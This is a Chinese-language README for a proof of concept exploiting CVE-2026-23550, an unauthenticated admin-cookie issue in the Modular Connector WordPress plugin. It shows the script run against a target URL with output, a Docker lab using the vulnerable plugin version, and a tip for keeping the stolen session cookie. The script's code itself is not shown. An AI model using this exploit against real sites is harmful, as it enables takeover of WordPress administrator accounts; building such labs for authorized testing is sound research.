# 生产就绪 PoC
./CVE-2026-23550-PoC.sh http://target.com
[+] CVE-2026-23550 Modular Connector 漏洞利用测试
[+] 存在漏洞:已签发管理员会话 Cookie
受影响的 REST 端点仅可通过 ?rest_route= 机制访问;通过 /wp-json/ 直接访问可能不可用。该漏洞允许在无需凭据或 nonce 验证的情况下进行未认证访问。成功签发 WordPress 管理员会话 Cookie 即构成漏洞利用确认。此概念验证不执行任何管理操作。测试时使用 Modular DS 版本 2.5.0。
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp
version: "3.9"
services:
db:
image: mysql:8.0
restart: always
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: wordpress
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:6.4.3-php8.2-apache
depends_on:
- db
ports:
- "8080:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wordpress
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
docker compose up -d
docker compose logs -f db
等待:"ready for connections"
curl http://localhost:8080/?rest_route=/
预期结果:
{
"name": "...",
"namespaces": [...]
}
如果此步骤失败 → 停止,环境已损坏。
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip
WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/
docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
/var/www/html/wp-content/plugins/modular-connector
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/
注意:如果您希望将 Cookie 保存到文本文件中,请从 poc.sh 文件中删除 "rm -f "$COOKIE_JAR""。
MIT 许可证 - 仅用于安全研究和授权渗透测试。 禁止恶意使用。请负责任地披露。
此 PoC 仅用于授权安全测试。未经授权对生产系统使用属违法行为。请向插件维护者报告发现的问题。